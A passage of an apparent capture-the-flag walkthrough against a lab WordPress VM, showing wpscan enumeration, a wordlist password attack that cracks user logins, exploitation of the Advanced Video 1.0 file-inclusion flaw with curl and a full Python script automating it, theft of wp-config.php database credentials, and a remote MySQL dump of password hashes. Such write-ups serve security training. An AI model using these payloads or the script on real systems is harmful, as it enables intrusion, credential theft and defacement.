                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time:         2020-05-12 00:47:44 (GMT-4)
---------------------------------------------------------------------------

Come to think of it, the nikto output had this.
Strange, it's not https... or is it...?
That's it.

# curl -k https://10.10.10.14:12380/robots.txt
User-agent: *
Disallow: /admin112233/
Disallow: /blogblog/

With https, Firefox can now show pages other than the homepage too.
With curl the certificate can't be verified, so to force the connection use the -k option.
Once more, looking at /admin112233/, /blogblog/ and /phpmyadmin/.
Looking at /admin112233/:

This could of been a BeEF-XSS hook;)

is displayed as what looks like an alert().
Not sure what it's getting at; maybe somebody was using beef-xss.
Looking at /blogblog/ shows a WordPress-like blog.
I mindlessly tried logging in with admin/admin, which didn't work.
Finally time for wpscan to do some real work.

# wpscan --disable-tls-checks --url https://10.10.10.14:12380/blogblog -e at,ap,u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: https://10.10.10.14:12380/blogblog/ [10.10.10.14]
[+] Started: Tue May 12 03:34:51 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.18 (Ubuntu)
 |  - Dave: Soemthing doesn't look right here
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: https://10.10.10.14:12380/blogblog/xmlrpc.php
 | Found By: Headers (Passive Detection)
 | Confidence: 100%
 | Confirmed By:
 |  - Link Tag (Passive Detection), 30% confidence
 |  - Direct Access (Aggressive Detection), 100% confidence
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] https://10.10.10.14:12380/blogblog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Registration is enabled: https://10.10.10.14:12380/blogblog/wp-login.php?action=register
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: https://10.10.10.14:12380/blogblog/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: https://10.10.10.14:12380/blogblog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.2.1 identified (Insecure, released on 2015-04-27).
 | Found By: Rss Generator (Passive Detection)
 |  - https://10.10.10.14:12380/blogblog/?feed=rss2, <generator>http://wordpress.org/?v=4.2.1</generator>
 |  - https://10.10.10.14:12380/blogblog/?feed=comments-rss2, <generator>http://wordpress.org/?v=4.2.1</generator>

[+] WordPress theme in use: bhost
 | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/
 | Last Updated: 2019-12-08T00:00:00.000Z
 | Readme: https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/readme.txt
 | [!] The version is out of date, the latest version is 1.4.4
 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1
 | Style Name: BHost
 | Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This theme ...
 | Author: Masum Billah
 | Author URI: http://getmasum.net/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2.9 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1, Match: 'Version: 1.2.9'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating All Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:31 <===================================> (20900 / 20900) 100.00% Time: 00:00:31
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] Theme(s) Identified:

[+] bhost
 | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/
 | Last Updated: 2019-12-08T00:00:00.000Z
 | Readme: https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/readme.txt
 | [!] The version is out of date, the latest version is 1.4.4
 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/style.css
 | Style Name: BHost
 | Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This theme ...
 | Author: Masum Billah
 | Author URI: http://getmasum.net/
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/, status: 500
 |
 | Version: 1.2.9 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/style.css, Match: 'Version: 1.2.9'

[+] creative-blog
 | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/creative-blog/
 | Last Updated: 2020-03-01T00:00:00.000Z
 | Readme: https://10.10.10.14:12380/blogblog/wp-content/themes/creative-blog/readme.txt
 | [!] The version is out of date, the latest version is 1.1.3
 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/creative-blog/style.css
 | Style Name: Creative Blog
 | Style URI: http://napitwptech.com/themes/creative-blog/
 | Description: Creative Blog is an extremely creative WordPress theme to create your own personal blog site very ea...
 | Author: Bishal Napit
 | Author URI: http://napitwptech.com/themes/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/creative-blog/, status: 500
 |
 | Version: 0.9 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/creative-blog/style.css, Match: 'Version: 0.9'

[+] sydney
 | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/sydney/
 | Last Updated: 2020-03-13T00:00:00.000Z
 | Readme: https://10.10.10.14:12380/blogblog/wp-content/themes/sydney/readme.txt
 | [!] The version is out of date, the latest version is 1.60
 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/sydney/style.css
 | Style Name: Sydney
 | Style URI: http://athemes.com/theme/sydney
 | Description: Sydney is a powerful business theme that provides a fast way for companies or freelancers to create ...
 | Author: aThemes
 | Author URI: http://athemes.com
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/sydney/, status: 500
 |
 | Version: 1.28 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/sydney/style.css, Match: 'Version: 1.28'

[+] trope
 | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/trope/
 | Last Updated: 2018-06-12T00:00:00.000Z
 | Readme: https://10.10.10.14:12380/blogblog/wp-content/themes/trope/readme.txt
 | [!] The version is out of date, the latest version is 1.2
 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/trope/style.css
 | Style Name: Trope
 | Style URI: http://wpdean.com/trope-wordpress-theme/
 | Description: Trope is a free WordPress theme that comes with clean, modern, minimal and fully responsive design w...
 | Author: WPDean
 | Author URI: http://wpdean.com/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/trope/, status: 500
 |
 | Version: 1.1.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/trope/style.css, Match: 'Version: 1.1.0'

[+] twentyfifteen
 | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfifteen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | Readme: https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfifteen/readme.txt
 | [!] The version is out of date, the latest version is 2.6
 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfifteen/style.css
 | Style Name: Twenty Fifteen
 | Style URI: https://wordpress.org/themes/twentyfifteen/
 | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfifteen/, status: 500
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfifteen/style.css, Match: 'Version: 1.1'

[+] twentyfourteen
 | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfourteen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | [!] The version is out of date, the latest version is 2.8
 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfourteen/style.css
 | Style Name: Twenty Fourteen
 | Style URI: https://wordpress.org/themes/twentyfourteen/
 | Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern design...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfourteen/, status: 500
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfourteen/style.css, Match: 'Version: 1.4'

[+] twentythirteen
 | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/twentythirteen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | [!] The version is out of date, the latest version is 3.0
 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/twentythirteen/style.css
 | Style Name: Twenty Thirteen
 | Style URI: https://wordpress.org/themes/twentythirteen/
 | Description: The 2013 theme for WordPress takes us back to the blog, featuring a full range of post formats, each...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/twentythirteen/, status: 500
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/twentythirteen/style.css, Match: 'Version: 1.5'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=========================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] John Smith
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By: Rss Generator (Passive Detection)

[+] peter
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] john
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] elly
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] barry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] heather
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] garry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] harry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] scott
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] kathy
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] tim
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Tue May 12 03:35:34 2020
[+] Requests Done: 20974
[+] Cached Requests: 52
[+] Data Sent: 5.399 MB
[+] Data Received: 3.296 MB
[+] Memory used: 276.891 MB
[+] Elapsed time: 00:00:43

First I went for a password attack, but:

# wpscan --disable-tls-checks --url https://10.10.10.14:12380/blogblog/ -U peter,john,elly,barry,heather,garry,harry,scott,kathy,tim -P /usr/share/wordlists/rockyou.txt
(snip)
[+] Performing password attack on Xmlrpc Multicall against 10 user/s
[SUCCESS] - garry / football                                                                                           
[SUCCESS] - harry / monkey                                                                                             
[SUCCESS] - scott / cookie                                                                                             
[SUCCESS] - kathy / coolgirl                                                                                           
^Cogress Time: 00:28:58 <                                                        > (675 / 172827)  0.39%  ETA: ??:??:??
[!] Valid Combinations Found:
 | Username: garry, Password: football
 | Username: harry, Password: monkey
 | Username: scott, Password: cookie
 | Username: kathy, Password: coolgirl

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Tue May 12 04:38:01 2020
[+] Requests Done: 727
[+] Cached Requests: 5
[+] Data Sent: 226.524 KB
[+] Data Received: 69.015 MB
[+] Memory used: 1.379 GB
[+] Elapsed time: 00:29:23

Scan Aborted: Canceled by User

It was taking too long, so I stopped it.
None of the cracked accounts was an admin, so I couldn't touch the themes or anything else.
If a vulnerable plugin turned up I felt I could make progress, but none had been found.
Then I noticed this:
enumerate all plugins is not working · Issue #1222 · wpscanteam/wpscan
Huh, so plugins can go undetected unless you pass the option. (wpscan's plugin detection defaults to passive mode, which only reports plugins referenced from the pages it fetches; a plugin that loads nothing on the public pages stays invisible until its known location is probed with --plugins-detection aggressive, at the cost of tens of thousands of extra requests.)
Tried it straight away.

# wpscan --disable-tls-checks --url https://10.10.10.14:12380/blogblog/ -e ap --plugins-detection aggressive
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

(snip)
[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:02:44 <===================================> (86467 / 86467) 100.00% Time: 00:02:44
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] advanced-video-embed-embed-videos-or-playlists
 | Location: https://10.10.10.14:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2015-10-14T13:52:00.000Z
 | Readme: https://10.10.10.14:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/, status: 200
 |
 | Version: 1.0 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt

[+] akismet
 | Location: https://10.10.10.14:12380/blogblog/wp-content/plugins/akismet/
 | Latest Version: 4.1.5
 | Last Updated: 2020-04-29T13:02:00.000Z
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/plugins/akismet/, status: 403
 |
 | The version could not be determined.

[+] shortcode-ui
 | Location: https://10.10.10.14:12380/blogblog/wp-content/plugins/shortcode-ui/
 | Last Updated: 2019-01-16T22:56:00.000Z
 | Readme: https://10.10.10.14:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
 | [!] The version is out of date, the latest version is 0.7.4
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/plugins/shortcode-ui/, status: 200
 |
 | Version: 0.6.2 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt

[+] two-factor
 | Location: https://10.10.10.14:12380/blogblog/wp-content/plugins/two-factor/
 | Latest Version: 0.5.2
 | Last Updated: 2020-04-30T14:02:00.000Z
 | Readme: https://10.10.10.14:12380/blogblog/wp-content/plugins/two-factor/readme.txt
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/plugins/two-factor/, status: 200
 |
 | The version could not be determined.

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Tue May 12 03:54:35 2020
[+] Requests Done: 86518
[+] Cached Requests: 13
[+] Data Sent: 23.032 MB
[+] Data Received: 11.735 MB
[+] Memory used: 404.73 MB
[+] Elapsed time: 00:03:10

The plugins showed up.
Searching for these four plugins: nothing for "two-factor", "akismet" ignored because its version is unknown, and none of the "shortcode-ui" hits looked applicable to the version installed here.

# searchsploit advanced video wordpress
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                                                       |  Path
                                                                                                                                                                                                     | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
WordPress Plugin Advanced Video 1.0 - Local File Inclusion                                                                                                                                           | exploits/php/webapps/39646.py
(snip)

So the LFI is the way forward.
But I couldn't work out how to use the exploit script,
so I'll do it with curl.

# curl -k https://10.10.10.14:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost\&title=32000\&short=rnd\&term=rnd\&thumb=../wp-config.php
https://10.10.10.14:12380/blogblog/?p=280
# curl -k https://10.10.10.14:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost\&title=32000\&short=rnd\&term=rnd\&thumb=../wp-config.php
https://10.10.10.14:12380/blogblog/?p=300

But all that comes back is a mysterious URL.
I thought it had failed, but going back to "/blogblog/" there is a mysterious jpeg post for every curl I ran?
I looked into where these posted files actually live.
They were under "/wp-content/uploads/". Reference: [Where can I find the directory of all my posts/articles in WordPress? - Stack Overflow](https://stackoverflow.com/questions/42590267/where-can-i-find-the-directory-of-all-my-posts-articles-in-wordpress)

https://$IP:12380/blogblog/wp-content/uploads/

Browsing there lets you download the jpegs (directory listing is enabled), so fetch one with curl.

# curl -k -O https://10.10.10.14:12380/blogblog/wp-content/uploads/463030943.jpeg
# file 463030943.jpeg 
463030943.jpeg: PHP script, ASCII text

It's PHP.

# cat 463030943.jpeg 
<?php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, and ABSPATH. You can find more information by visiting
 * {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
 * Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'plbkac');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'V 5p=[.Vds8~SX;>t)++Tt57U6{Xe`T|oW^eQ!mHr }]>9RX07W<sZ,I~`6Y5-T:');
define('SECURE_AUTH_KEY',  'vJZq=p.Ug,]:<-P#A|k-+:;JzV8*pZ|K/U*J][Nyvs+}&!/#>4#K7eFP5-av`n)2');
define('LOGGED_IN_KEY',    'ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU<cr.wm?|jqZH:YMv;zu@tM7P:4o');
define('NONCE_KEY',        'j|V8J.~n}R2,mlU%?C8o2[~6Vo1{Gt+4mykbYH;HDAIj9TE?QQI!VW]]D`3i73xO');
define('AUTH_SALT',        'I{gDlDs`Z@.+/AdyzYw4%+<WsO-LDBHT}>}!||Xrf@1E6jJNV={p1?yMKYec*OI$');
define('SECURE_AUTH_SALT', '.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*>#z+p>nVi10`XOUq (Zml~op3SG4OG_D');
define('LOGGED_IN_SALT',   '[Zz!)%R7/w37+:9L#.=hL:cyeMM2kTx&_nP4{D}n=y=FQt%zJw>c[a+;ppCzIkt;');
define('NONCE_SALT',       'tb(}BfgB7l!rhDVm{eK6^MSN-|o]S]]axl4TE_y+Fi5I-RxN/9xeTsK]#ga_9:hJ');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each a unique
 * prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
    define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

define('WP_HTTP_BLOCK_EXTERNAL', true);

I hadn't read the exploit script at all, but so this is what the LFI does:
it copies the contents of whatever local file you point it at into a text file with a .jpeg name under uploads, where it can be downloaded.
Anyway, thanks to "wp-config.php" it looks like I can get into MySQL. The credentials are for localhost, but 3306 was open in the nmap scan and the server accepts a remote root login, so the file read turns into full database access.
Goal: log in to WordPress as admin and deface a page.
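The manual curl-then-browse-uploads loop above can be scripted. The following is an added example (not the page's own commands and not the exploit-db script): it fires the same ave_publishPost request, diffs the uploads directory listing around the request to find the file the plugin created, downloads it and applies the same "is this really a JPEG?" check that file(1) did above. The base URL, the injectable fetch callable and the offline sample responses in make_offline_fetch() are assumptions and constructed data, so the script runs without the target.

```python
"""Drive the Advanced Video 1.0 LFI the way it was driven by hand above:
hit ave_publishPost with thumb=<local path>, then locate and download the
"jpeg" the plugin drops into wp-content/uploads/ (directory listing is on).

Added example, not the page's own commands nor the exploit-db script.
The base URL, the injectable `fetch` callable and the offline sample
responses in make_offline_fetch() are assumptions / constructed data."""
import ssl
import urllib.request
from html.parser import HTMLParser
from typing import Callable, Set
from urllib.parse import quote

Fetch = Callable[[str], bytes]


def default_fetch(url: str) -> bytes:
    """GET that ignores the box's self-signed certificate (what curl -k did)."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with urllib.request.urlopen(url, context=ctx, timeout=15) as resp:
        return resp.read()


class _Links(HTMLParser):
    """Collect href values from an Apache-style index page."""
    def __init__(self) -> None:
        super().__init__()
        self.hrefs: Set[str] = set()

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.hrefs.update(v for k, v in attrs if k == "href" and v)


def list_uploads(base: str, fetch: Fetch) -> Set[str]:
    """File names visible in wp-content/uploads/ (drops sort links and parent dir)."""
    p = _Links()
    p.feed(fetch(f"{base}/wp-content/uploads/").decode("utf-8", "replace"))
    return {h for h in p.hrefs if "?" not in h and "/" not in h}


def trigger_lfi(base: str, target: str, fetch: Fetch) -> str:
    """Make the plugin copy `target` into uploads/<random>.jpeg.

    The endpoint only answers with the URL of the post it created, which is
    why the curl calls above looked as if they had failed."""
    url = (f"{base}/wp-admin/admin-ajax.php?action=ave_publishPost"
           f"&title=32000&short=rnd&term=rnd&thumb={quote(target, safe='/')}")
    return fetch(url).decode("utf-8", "replace").strip()


def classify(blob: bytes) -> str:
    """Poor man's file(1): a real JPEG starts with FF D8 FF, ours starts with <?php."""
    if blob.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    if blob.lstrip().startswith(b"<?php"):
        return "php"
    return "other"


def read_file_via_lfi(base: str, target: str, fetch: Fetch = default_fetch) -> bytes:
    """Diff the uploads listing around the trigger to find the file it created."""
    before = list_uploads(base, fetch)
    trigger_lfi(base, target, fetch)
    created = sorted(n for n in list_uploads(base, fetch) - before if n.endswith(".jpeg"))
    if len(created) != 1:
        raise RuntimeError(f"expected exactly one new .jpeg, got {created}")
    return fetch(f"{base}/wp-content/uploads/{created[0]}")


def make_offline_fetch() -> Fetch:
    """Constructed stand-in for the target so the flow can be exercised offline."""
    files = ["123.jpeg"]
    config = b"<?php\n/** constructed sample of the leaked wp-config.php */\ndefine('DB_USER', 'root');\n"

    def fetch(url: str) -> bytes:
        if "admin-ajax.php?action=ave_publishPost" in url:
            files.append("463030943.jpeg")          # the plugin's side effect
            return b"https://10.10.10.14:12380/blogblog/?p=280\n"
        if url.endswith("/wp-content/uploads/"):
            rows = "".join(f'<a href="{f}">{f}</a>' for f in files)
            return (b'<a href="?C=N;O=D">Name</a><a href="/blogblog/wp-content/">Parent Directory</a>'
                    + rows.encode())
        if url.endswith("/uploads/463030943.jpeg"):
            return config
        raise RuntimeError("unexpected URL " + url)
    return fetch


if __name__ == "__main__":
    base = "https://10.10.10.14:12380/blogblog"        # assumed target
    blob = read_file_via_lfi(base, "../wp-config.php", make_offline_fetch())
    print(classify(blob), blob.decode())
```

Against the real box you would pass default_fetch (or leave the argument out) instead of make_offline_fetch(); diffing the listing rather than guessing the file name means the script also works when other "jpegs" from earlier attempts are already lying around.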

# mysql -h 10.10.10.14 -u root -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 945
Server version: 5.7.12-0ubuntu1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.


MySQL > show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| loot               |
| mysql              |
| performance_schema |
| phpmyadmin         |
| proof              |
| sys                |
| wordpress          |
+--------------------+
8 rows in set (0.001 sec)

MySQL > use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [wordpress]> show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
11 rows in set (0.001 sec)

MySQL [wordpress]> select * from wp_users;
+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+
| ID | user_login | user_pass                          | user_nicename | user_email            | user_url         | user_registered     | user_activation_key | user_status | display_name    |
+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+
|  1 | John       | $P$B7889EMq/erHIuZapMB8GEizebcIy9. | john          | john@red.localhost    | http://localhost | 2016-06-03 23:18:47 |                     |           0 | John Smith      |
|  2 | Elly       | $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 | elly          | Elly@red.localhost    |                  | 2016-06-05 16:11:33 |                     |           0 | Elly Jones      |
|  3 | Peter      | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 | peter         | peter@red.localhost   |                  | 2016-06-05 16:13:16 |                     |           0 | Peter Parker    |
|  4 | barry      | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 | barry         | barry@red.localhost   |                  | 2016-06-05 16:14:26 |                     |           0 | Barry Atkins    |
|  5 | heather    | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 | heather       | heather@red.localhost |                  | 2016-06-05 16:18:04 |                     |           0 | Heather Neville |
|  6 | garry      | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 | garry         | garry@red.localhost   |                  | 2016-06-05 16:18:23 |                     |           0 | garry           |
|  7 | harry      | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 | harry         | harry@red.localhost   |                  | 2016-06-05 16:18:41 |                     |           0 | harry           |
|  8 | scott      | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 | scott         | scott@red.localhost   |                  | 2016-06-05 16:18:59 |                     |           0 | scott           |
|  9 | kathy      | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 | kathy         | kathy@red.localhost   |                  | 2016-06-05 16:19:14 |                     |           0 | kathy           |
| 10 | tim        | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 | tim           | tim@red.localhost     |                  | 2016-06-05 16:19:29 |                     |           0 | tim             |
